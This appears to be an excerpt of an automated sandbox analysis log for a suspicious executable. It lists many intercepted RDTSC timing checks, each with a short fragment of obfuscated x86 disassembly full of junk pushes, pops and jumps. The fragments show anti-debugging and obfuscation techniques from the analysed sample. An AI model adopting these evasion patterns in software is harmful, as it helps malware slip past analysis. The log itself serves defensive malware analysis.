Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127CC3C second address: 127CCAC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FECC5476B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e jmp 00007FECC5476B35h 0x00000013 pop ebx 0x00000014 nop 0x00000015 mov dword ptr [ebp+1247CC0Eh], esi 0x0000001b movsx edi, di 0x0000001e push 00000000h 0x00000020 or dword ptr [ebp+122D1B3Ch], edi 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007FECC5476B28h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 xor bx, 584Ch 0x00000047 xchg eax, esi 0x00000048 jno 00007FECC5476B2Eh 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12746C3 second address: 12747A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5126365h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FECC5126358h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 jmp 00007FECC5126366h 0x0000002b push dword ptr fs:[00000000h] 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007FECC5126358h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c js 00007FECC5126364h 0x00000052 jmp 00007FECC512635Eh 0x00000057 mov dword ptr fs:[00000000h], esp 0x0000005e jmp 00007FECC5126367h 0x00000063 mov eax, dword ptr [ebp+122D1711h] 0x00000069 je 00007FECC5126366h 0x0000006f jmp 00007FECC5126360h 0x00000074 push FFFFFFFFh 0x00000076 or dword ptr [ebp+122D17F3h], esi 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f jg 00007FECC512635Ch 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1281127 second address: 128112D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128112D second address: 1281141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FECC512635Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1281141 second address: 1281146 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1281146 second address: 128114C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1283D0B second address: 1283D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1289F05 second address: 1289F0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1289787 second address: 1289793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jc 00007FECC5476B26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12898E8 second address: 12898FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FECC5126361h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12898FE second address: 1289915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FECC5476B26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FECC5476B28h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1289915 second address: 128991B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1289A87 second address: 1289AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FECC5476B2Bh 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FECC5476B2Fh 0x00000017 popad 0x00000018 push ecx 0x00000019 jmp 00007FECC5476B2Fh 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128E86C second address: 128E871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128E871 second address: 128E89A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007FECC5476B2Bh 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128E89A second address: 128E89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1293B15 second address: 1293B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1293B19 second address: 1293B2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FECC512635Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1293B2A second address: 1293B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1293B30 second address: 1293B43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC512635Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1292853 second address: 1292859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1292DFF second address: 1292E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC512635Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12930BF second address: 12930DA instructions: 0x00000000 rdtsc 0x00000002 jne 00007FECC5476B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jp 00007FECC5476B26h 0x00000011 je 00007FECC5476B26h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12934C3 second address: 12934CF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12934CF second address: 12934D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1293796 second address: 12937C2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FECC5126356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FECC5126372h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1293915 second address: 1293931 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1293931 second address: 129394E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FECC5126368h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129CC96 second address: 129CCA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129B9ED second address: 129B9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007FECC512635Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129B9FA second address: 129BA05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129BCD2 second address: 129BCDC instructions: 0x00000000 rdtsc 0x00000002 js 00007FECC5126356h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129BCDC second address: 129BCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129BFA8 second address: 129BFCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FECC512635Ah 0x0000000b popad 0x0000000c push edx 0x0000000d jmp 00007FECC512635Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129BFCC second address: 129BFD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129B707 second address: 129B70B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129C3CC second address: 129C3D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129C3D2 second address: 129C3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FECC512635Dh 0x00000009 popad 0x0000000a jmp 00007FECC5126368h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129C54D second address: 129C560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5476B2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129C560 second address: 129C56B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FECC5126356h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129C56B second address: 129C570 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129C570 second address: 129C578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129C578 second address: 129C57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 129C6CA second address: 129C6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jnl 00007FECC5126356h 0x00000012 ja 00007FECC5126356h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121E9E7 second address: 121E9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A1B7E second address: 12A1B96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC512635Ch 0x00000007 jc 00007FECC512635Eh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A7342 second address: 12A734C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A5DC1 second address: 12A5DD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECC5126361h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A5DD6 second address: 12A5DE3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FECC5476B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A5DE3 second address: 12A5DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A6052 second address: 12A6075 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FECC5476B37h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A6075 second address: 12A6079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A6079 second address: 12A607F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A607F second address: 12A6091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FECC5126358h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A6091 second address: 12A6095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A6095 second address: 12A60C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC512635Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jl 00007FECC512637Ah 0x00000010 jl 00007FECC5126362h 0x00000016 js 00007FECC5126356h 0x0000001c jbe 00007FECC5126356h 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A60C3 second address: 12A60C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A61FD second address: 12A6214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FECC5126356h 0x0000000a popad 0x0000000b pop edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FECC5126356h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A6214 second address: 12A6235 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FECC5476B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FECC5476B2Fh 0x00000011 jc 00007FECC5476B26h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A6235 second address: 12A6239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A637B second address: 12A6381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A6381 second address: 12A6385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A6529 second address: 12A652F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A6A78 second address: 12A6AB1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FECC5126356h 0x00000008 js 00007FECC5126356h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 ja 00007FECC5126356h 0x00000019 jmp 00007FECC5126367h 0x0000001e popad 0x0000001f jnl 00007FECC5126358h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A6AB1 second address: 12A6AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A6C1D second address: 12A6C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A6C21 second address: 12A6C2B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FECC5476B26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A6C2B second address: 12A6C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007FECC5126356h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A71D9 second address: 12A71EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FECC5476B2Ch 0x00000009 jo 00007FECC5476B26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1260C62 second address: 1260C68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1260C68 second address: 124B51A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FECC5476B2Ch 0x00000008 jbe 00007FECC5476B26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jnp 00007FECC5476B33h 0x0000001e popad 0x0000001f nop 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007FECC5476B28h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Ah 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a mov cx, 5682h 0x0000003e sbb ecx, 49DFE7DBh 0x00000044 call dword ptr [ebp+122D27D1h] 0x0000004a jc 00007FECC5476B4Ah 0x00000050 jmp 00007FECC5476B30h 0x00000055 jmp 00007FECC5476B34h 0x0000005a pushad 0x0000005b jp 00007FECC5476B28h 0x00000061 push esi 0x00000062 pop esi 0x00000063 jno 00007FECC5476B35h 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1261181 second address: 126118B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FECC5126356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12612F0 second address: 12612F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12612F4 second address: 1261312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5126360h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1261312 second address: 1261316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12614C8 second address: 126151F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jnl 00007FECC5126362h 0x0000000c xchg eax, esi 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FECC5126358h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 or dword ptr [ebp+122D2403h], ecx 0x0000002d nop 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FECC5126360h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1261B8D second address: 1261B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AAF81 second address: 12AAFAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5126368h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jo 00007FECC5126356h 0x00000013 pop eax 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AAFAB second address: 12AAFCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FECC5476B26h 0x0000000f jmp 00007FECC5476B35h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AAFCF second address: 12AAFD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AB13A second address: 12AB13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AB13E second address: 12AB15A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FECC5126362h 0x00000008 jno 00007FECC512635Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AB401 second address: 12AB408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AB6BA second address: 12AB6E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC512635Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FECC5126356h 0x00000011 jmp 00007FECC5126367h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12ADBB4 second address: 12ADBB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12ADBB9 second address: 12ADC0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FECC5126366h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FECC5126365h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FECC5126368h 0x00000019 push edi 0x0000001a pushad 0x0000001b popad 0x0000001c pop edi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B0F12 second address: 12B0F28 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jo 00007FECC5476B26h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B06F3 second address: 12B06FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B088B second address: 12B08CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007FECC5476B26h 0x0000000c jmp 00007FECC5476B39h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FECC5476B36h 0x00000019 ja 00007FECC5476B26h 0x0000001f rdtsc
